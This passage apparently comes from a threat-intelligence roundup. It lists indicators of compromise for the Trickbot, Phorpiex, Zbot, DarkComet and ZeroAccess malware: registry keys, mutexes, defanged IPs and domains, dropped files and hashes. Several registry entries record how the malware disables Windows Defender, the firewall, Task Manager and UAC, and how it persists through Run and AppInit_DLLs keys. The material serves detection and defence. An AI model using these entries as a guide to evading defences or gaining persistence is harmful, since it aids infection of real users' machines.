1ad1ff05930f27ef4b349c7a612235d1632ef7ceaa1a17adf7c7b3a97b40ca4d 1d92855b93ac6e841ca7afe057ceef7c6a52eb1aa511c47c523d25c7f542785b 2089c98c6d15a5c669795eea5a310ec83cbf7614be2aae5bc1ed1721e406360d 2175ae9fcf2321d5855a81146a650a9fe69d622a3d0303076fbfe32ddc645bd1 2275693f9a5b245d54030abaaa757f799c369df22b26cce4a8df84d1497b682b 23f18138a5aa4ff7284e25faa8490b14706170a7980b73a2cb69527fa19a9655 25da27f6d266e9986c93a48d93be82632fdfc607416d42e183c27b404591a808 26213f98dda98e08963a7a2934a6eadb665121a23aa14493cc45f5c6b23e7099 2a80f80c219f9554c9779e86c47a51a27858a767bb7b1c45b1d52055f6b9a30a `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-_R0i9VaZ4iA/XcWWBOk-xpI/AAAAAAAAC5U/KuSmcoHMEeIdwllhvRMx-bq15Mc9KAq5ACLcBGAsYHQ/s1600/7f8eeaddf5e3e649e6710cb5246056903d0ba87cfb38071af1ff578e87bd4a89_amp.png>)\n\n \n\n\n#### 
Umbrella\n\n[](<https://1.bp.blogspot.com/-P3LBFfzeJJs/XcWWFQS7ghI/AAAAAAAAC5Y/6uUrKObp4EE56kf91pzDRwq38IawApd6QCLcBGAsYHQ/s1600/55894b7c23326f3f24f0c8eb13077874cefac9d266d6392ac40bd93c144760f6_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7374019-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER \nValue Name: DisableAntiSpyware ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: DeleteFlag ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableBehaviorMonitoring ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableIOAVProtection ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableOnAccessProtection ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableScanOnRealtimeEnable ` | 26 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 11 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 26 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`72[.]22[.]185[.]208` | 17 \n`72[.]22[.]185[.]200` | 9 \n`116[.]203[.]16[.]95` | 5 \n`216[.]239[.]32[.]21` | 4 \n`216[.]239[.]36[.]21` | 3 \n`82[.]146[.]46[.]153` | 3 \n`107[.]173[.]6[.]251` | 3 \n`78[.]155[.]207[.]139` | 3 \n`216[.]239[.]34[.]21` | 2 \n`176[.]58[.]123[.]25` | 2 \n`177[.]124[.]37[.]208` | 2 \n`201[.]184[.]69[.]50` | 2 \n`179[.]189[.]241[.]254` | 2 \n`36[.]66[.]115[.]180` | 2 \n`177[.]36[.]5[.]7` | 2 \n`185[.]86[.]150[.]130` | 2 \n`149[.]154[.]70[.]202` | 2 \n`195[.]123[.]246[.]188` | 2 \n`185[.]117[.]119[.]163` | 2 \n`172[.]217[.]12[.]179` | 1 \n`104[.]20[.]17[.]242` | 1 \n`185[.]248[.]87[.]88` | 1 \n`80[.]173[.]224[.]81` | 1 \n`103[.]122[.]33[.]58` | 1 \n`177[.]107[.]51[.]162` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip[.]anysrc[.]net` | 5 \n`myexternalip[.]com` | 4 \n`ipecho[.]net` | 4 \n`api[.]ipify[.]org` | 4 \n`ident[.]me` | 2 \n`checkip[.]amazonaws[.]com` | 2 \n`www[.]myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`api[.]ip[.]sb` | 1 \n`wtfismyip[.]com` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\wnetwork\\settings.ini` | 26 \n`%System32%\\Tasks\\Windows Network` | 26 \n`%APPDATA%\\wnetwork` | 26 \n`%APPDATA%\\WNETWORK\\<original file name>.exe` | 26 \n \n#### File Hashes\n\n` 0997acfd174ab60400f87700683b13a8e30003187a1ac95f8e03e7ef42722ed0 16a4034a84ee8568cb2f8eb5dadabc4602c0a8e8868f73672d50dfbf1a7f4d58 1b4e99fdce2dd1e3fec9d2544d998991b7db608fc546f3fcd095116c74abf5a6 1d004310b4da6128d37fbbc500fd2edaaac340ad0c02a6d955bb865b6bbf5a36 22a575f49efea2455bba405158a36e037ffb74a54d19a3594b9b91496235b94a 33174b58598cbfad8263865a35541f8cb45fb8c6bfef793fe8cf959386a01f5d 3614608cb133bd6ee5c664d32a70a4f6daabd51c5aa3e8305481a2c8e8e5e050 3be01a7decf86e147148172f9fd49a1dddb0fc61fa19f1f513200bef005d5621 
533fbff0ab14351994eda4fdbfd54521f69b26aea55f1f4cbdc0a766ea665475 63fc0be214ba24b78e8af0c3fcc739bc65f2c93f47f2c0fd5fc36fab7c3b1ee9 6664ecbb04496f8769bd64664cc927aa5b3da2d8db2c90c74f9115d13611f2ee 690160e08d961b5eb173e8d83489182ff1bc593fbacc1ccef29d34b2c123f852 6f9d90e562dbc99bf48c6da0f62acca06483e4cc237f823fd420972e4cab8acb 84b2e1dadf6434fbd682ad5443c07fd584e9ba90ca78cff4e34453da08f9b1a0 8a8e4c0576135b4d7e53e8d371cbaa3044d04aa7487b5165d3a25c7ceb98ef40 8b3ce83864c0fe181a9dc5fc05db1ed0f5b8fa8afb21bf47e13cb42012f99d37 90343d4a110021355c361ba1187512cd992644f1f563451014c330b6100c31bb 918b82b76908de34fc26f1addda953604c608071d2e960aa7ac024dac36b445a 93c68821eea7086225918c163c8480f2f49f3a6b155a221af7211c795ce6b32e 977cc7fd45f54546066ab08ae04f31876d2347948b2631a011756f2a45f8588e 99aad62bb62905258fd7b9ee63811f16c0cb686dc86b49e5f33e0d465d2ecc0b a169e851112a15be3a17a6059e50cfedccd2928a7a2afde40aa21a13bbb31dd5 a77f072f98bba728809627c5cce0408dffd1e6277a5febf654f11c8e5a63f6c7 a94fb77c70d6d08e50aa251e619f7f6a2bd0983322677a5f0b38ba3cd2c46abb aa2709ee07f4479a85e0d64e8f4f08c87ff747fe658f8e93e30713ab6d46724c `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-dINdaoH_6J8/XcWWSG5Lu4I/AAAAAAAAC5g/xt-_H4TWgJEEUL2OlqKNW8gXOAgvOO60QCLcBGAsYHQ/s1600/1d004310b4da6128d37fbbc500fd2edaaac340ad0c02a6d955bb865b6bbf5a36_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Phorpiex-7373816-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Service ` | 12 
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Service ` | 12 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\system32\\rundll32.exe ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Impersonate ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Asynchronous ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: MaxWait ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: DllName ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Startup ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: pixedfu ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: FFC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BCC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: *BCC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 00FFC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: C6F26321 ` | 1 \nMutexes | Occurrences \n---|--- \n`.:-Tldr-:.` | 10 \n`A9MTX7ERFAMKLQ` | 3 \n`A9ZLO3DAFRVH1WAE` | 3 \n`AhY93G7iia` | 3 \n`B81XZCHO7OLPA` | 3 \n`BSKLZ1RVAUON` | 3 \n`F-DAH77-LLP` | 3 \n`FURLENTG3a` | 3 \n`FstCNMutex` | 3 \n`GJLAAZGJI156R` | 3 \n`I-103-139-900557` | 3 \n`I106865886KMTX` | 3 \n`IGBIASAARMOAIZ` | 3 
\n`J8OSEXAZLIYSQ8J` | 3 \n`LXCV0IMGIXS0RTA1` | 3 \n`MKS8IUMZ13NOZ` | 3 \n`OLZTR-AFHK11` | 3 \n`OPLXSDF19WRQ` | 3 \n`PLAX7FASCI8AMNA` | 3 \n`RGT70AXCNUUD3` | 3 \n`TEKL1AFHJ3` | 3 \n`TXA19EQZP13A6JTR` | 3 \n`VSHBZL6SWAG0C` | 3 \n`chimvietnong` | 3 \n`drofyunfdou` | 3 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`92[.]63[.]197[.]106` | 10 \n`66[.]199[.]229[.]251` | 3 \n`216[.]58[.]206[.]81` | 3 \n`141[.]101[.]129[.]46` | 3 \n`141[.]101[.]129[.]45` | 3 \n`172[.]217[.]7[.]174` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ofoanefubehauufdu[.]ru` | 11 \n`osgohfoeaugfoauef[.]ru` | 8 \n`dio[.]shojnoc[.]com` | 3 \n`dia[.]shojnoc[.]com` | 2 \n`ieguaoeuafhoauedg[.]ru` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`\\_\\DeviceManager.exe` | 12 \n`\\.lnk` | 12 \n`E:\\.lnk` | 12 \n`E:\\$RECYCLE.BIN` | 12 \n`E:\\_` | 12 \n`E:\\_\\DeviceManager.exe` | 12 \n`%SystemRoot%\\T-580580975794906058` | 12 \n`%APPDATA%\\winsvcmgr.txt` | 12 \n`%SystemRoot%\\T-580580975794906058\\winsvc.exe` | 12 \n`%HOMEPATH%\\Local Settings\\Application Data\\pixedfu.dll` | 3 \n`%LOCALAPPDATA%\\pixedfu.dll` | 3 \n`%TEMP%\\323221246224071.exe` | 2 \n`\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\AppData\\_HELP_INSTRUCTION.TXT` | 1 \n`%APPDATA%\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Desktop\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Documents\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Downloads\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Favorites\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Links\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Saved Games\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\_HELP_INSTRUCTION.TXT` | 1 \n`%PUBLIC%\\Music\\Sample Music\\12EAEF0D255F4C3289F8C16727C42FE6.BACKUP` | 1 \n`%PUBLIC%\\Music\\Sample Music\\20410F1A046679B6EE5BB84B050B5D6A.BACKUP` | 1 \n`%PUBLIC%\\Music\\Sample 
Music\\CD5F520B00FF264246AA4685031109F6.BACKUP` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 01800a0b77486384e49b910debe10f7cee0b315bcf58fde71697f0dd4ec3540e 2032430a872c8bf354dcd1d6ae0f7aca4d02f5b4f0dcfa43ce3d1f795c8c9c72 43503180b734d83a724db448cd4d94b1b4a3096dabec6b9411af061337af8c35 5cf483ced208bc37ee1e71346a22615c88ee294a8b3b411b5d11e77571e2e4fd 7aa31bf90f13024bbcb547c126115b112b17a130fc8169712351c418f93516ca 86d2c77b7dc01092d3591f95f99a7ba79c06e06e83759b7965d18032102a823a 8e56d2ba3bf9e86c66e0eeafe453a8c36f692b4f22edb9e96fecaaef8e894d51 94179eab10b3a394790f3bfd5cf10c5bcabb16cd534997f6361064ac5e686342 af69f159ac7741ff8c72ea41fe76436512c84f7de6870caa6268ca28ac87aabd c6365099edb25124ad0ac0ffbe5a246d3d27a15c42e5bebb3a6a5994797611ef ca4a36212c31444ed2f0c173c0fb9a2ca43a8cfdf2ba7663b3eea52e150a02f3 cea3556aa39780fa88283ac4b89f75bb9e0070fc870f8c2f2940d74c124999ca d70bed520eccb3afa3ebaac4a1644e1b603e407c386a5a3dfeee864acc8be52d e1ef644770cf7cb312df7b2112a140386e246e6bb8c5fb607707e08bc1ad31ad e96f931910f1f64cadda65519f52c5ccd2311cd9d4aa705815b28a21559a4f18 f00fe52b605c93783f69f8ff95605484c73600a0c4ef33336b565e3adfd7bf8b f22b9841d6cfca96f89543e43f6dce478dbed764c3083b7a2dce8ba42e8a2b34 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1rixAc0aBNI/XcWWiOeLsAI/AAAAAAAAC5o/KflN-Y8gTYM1-_vl2Ca0dz28748UIQfcwCLcBGAsYHQ/s1600/5cf483ced208bc37ee1e71346a22615c88ee294a8b3b411b5d11e77571e2e4fd_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Zbot-7373691-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: LoadAppInit_DLLs ` | 48 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS 
NT\\CURRENTVERSION\\WINDOWS \nValue Name: AppInit_DLLs ` | 48 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\aybbmte` | 48 \n`%ProgramData%\\Mozilla\\thfirxd.exe` | 48 \n`%ProgramData%\\Mozilla\\lygbwac.dll` | 48 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\kvlcuie.dll` | 42 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\tfbkpde.exe` | 42 \n`%SystemRoot%\\Tasks\\kylaxsk.job` | 42 \n \n#### File Hashes\n\n` 0008d767954ff4cd48317862040f44a8550279d2f80730db9d8c9a6c3e6f69f7 01b1b04fd8af635ddc5953b9c3bd87d510c38476477f201fa59b6ac1ebc89265 02e089e46e5d3a515394aec09a6f8a37cb8be989730bc9a7c29660bfe8f2e1aa 0878a61c44c6f24ea9b7455e663c9ae1f059f5581067957564af8cc90d7bead1 08c3aed6e3b36b219a22d80947cb02a1da27cdd955dcab8938f366c938641d99 0a586547643e008b351990181c6434a4ad1b1d91e2d8cfd2dcc654459e415652 0be41d1d76850b8b1bd55121ecb12c43b20493e7ef00a83d366092998b126a66 1142bde6260aacc7770f40931f1b10a3d72e479e482536590df5c8af3fe7cdb2 11f76ef08d086a6e3f87466f8a77c7bc63dd754dbd5aaf27deaf4e78abe46c4e 12ccd85f6d507d2b558259c0e987c1c0d104dddd62af38b6597c21055bb35f7e 13235beb6e3d194b599cc7cb1eb82ced9cad5ee17ddac09ae13942aed2b4ff14 143471cc5a4f7299a4009841fb1b92ec52bec2f78b426281d0bacc02946855b7 171fdd6c8d3e43050ab23eb0327fd74094ec7d813c5fb4f2f5668a6650e5088a 1be73946fc11127b9587440b45b8ba9452273c1b47698060562f5d6b0c914514 1ed93147bbaf222006509898c620b1cb65866d1f57d12c7f69a0db49cb459730 20a5e8c87d9d5f9c4f212c8324e1c51941c2c92e4193bb460454451c43763c65 23a1c96747d375ef9098389078a48ffe53305fce872ae8d056697aa1f4aee4bf 23f6e421ea4cdb20ba4d0f1b94100847dd67537fa438d0b0579579bca2aa9e64 249534c79cd24e2d4f756ee051f5fa3da34a85ac4d60b24afc19d0d01b03f446 24cfdb52074fedadb316ec85968e36576f44660b618edc8582c4a9d1134a4344 25bac99d7d11cb4a6da8d9a1742da2e31bc59751ed7d557677a11c5ec251a149 285c4a1f783602c538395337b0724f384806f308be12fef1654f77f667762412 29286b6965a37a18bb510f2ceff996456133395c0af62e2d87e58c86877b7a5b 296d4d39691aa73e5392b57a1dff3cf34f7f1e3548ab38d22e7c1bcceb30fc11 
2bf03d005dc768b24c4a27218e41c5781902edd872f934d24c02958fd172fbc0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-y_89MF6JiSQ/XcWWvf1lbjI/AAAAAAAAC5w/TfLgCfHaaFQfsmUfsqmuItv9tqAFPZeDQCLcBGAsYHQ/s1600/4b93b20f209a34073d128875fb8bafcb482331a2f39f3eda3af78d4850d630a9_amp.png>)\n\n \n\n\n* * *\n\n### Win.Malware.DarkComet-7371375-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION\\EXPLORERN \nValue Name: NoControlPanel ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableRegistryTools ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION ` | 1 
\n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION\\EXPLORERN ` | 1 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-F54S21D` | 10 \n`DC_MUTEX-<random, matching [A-Z0-9]{7}>` | 6 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`88[.]67[.]72[.]218` | 5 \n`189[.]24[.]196[.]171` | 3 \n`187[.]14[.]155[.]193` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\dclogs` | 12 \n`%TEMP%\\tmpcmd.bat` | 1 \n \n#### File Hashes\n\n` 198fd0be4b6734556acf2ac56b3caff28d402ef10c0875180ab02a62d320b9c1 3201cfb883cd1c3b8f13b639a40cd08b3a701df41d6488228b586d7909a6f9c3 384fb4c37f5649edff99a8ce89b65b66a74fffe0e27dc8ad0abc6b949391e7e6 386a72805830c4e97a5970ab2c50e973394d2f0c2d89f1be33219a79ae988ab5 3ca6b7c42876362f7c1b27c86e45f5d95443a385ffa01226ab25cea998176219 42b444b7738492be745183895147d005f825dfa44c4b2cb1e256f6a146e3fa63 54f3ab508247399214721d27e61b5f9be1797cf54e1f80590a6075f1086df697 6283cb17aa670de5710f160fe411ba49cd8d6f12ec96141c787311f03d3dbfa0 7175a539ad4450790dcb7fc70b3a83c8fb85001b2fca89e5bdef6b106175c586 7d82900300161ba47eb3ec68e9ebea0f55986a33affff5bbe43e0dd5fee2d907 a7b843e8ece17f12410ed58e1de94c03126d74192d3732dae6071aefb6b190f2 b18d500a121437df8d1170fdf315b8dbe53d0f69214963a665c484bc47a1d3cd b7cfcc21847f1be733342c7c635d30152e3cbc7ac456d44faeb3d0d61933f02d d4c3d0934d55956d694a8097bcd0b69c4743e681ab1985e689d71827514fdd63 dcfc58bbe29cd4d7634c21ac390cca9c3f12becaf8584ac3d3a90da2cd329585 fbaf7fd94f82e6f9dc6de640564350f00b0901763249e14ad29748a79bc41a43 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### 
AMP\n\n[](<https://1.bp.blogspot.com/-YAjhHX1eebw/XcWW8b_sG4I/AAAAAAAAC54/AhmyiOLTkHYdgwspk5bpXeRm6kK9VWFTACLcBGAsYHQ/s1600/3ca6b7c42876362f7c1b27c86e45f5d95443a385ffa01226ab25cea998176219_amp.png>)\n\n \n\n\n* * *\n\n### Win.Packed.ZeroAccess-7370742-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Start ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 8 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 \nValue Name: ThreadingModel ` | 8 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 ` | 8 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 8 \n`<HKLM>\\SOFTWARE\\CLASSES\\CLSID\\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\\INPROCSERVER32 ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000010 \nValue Name: 
PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004 \nValue Name: PackedCatalogItem ` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`180[.]254[.]253[.]254` | 8 \n`166[.]254[.]253[.]254` | 8 \n`135[.]254[.]253[.]254` | 8 \n`117[.]254[.]253[.]254` | 8 \n`119[.]254[.]253[.]254` | 8 \n`134[.]254[.]253[.]254` | 8 \n`206[.]254[.]253[.]254` | 8 \n`222[.]254[.]253[.]254` | 8 \n`182[.]254[.]253[.]254` | 8 \n`190[.]254[.]253[.]254` | 8 \n`184[.]254[.]253[.]254` | 8 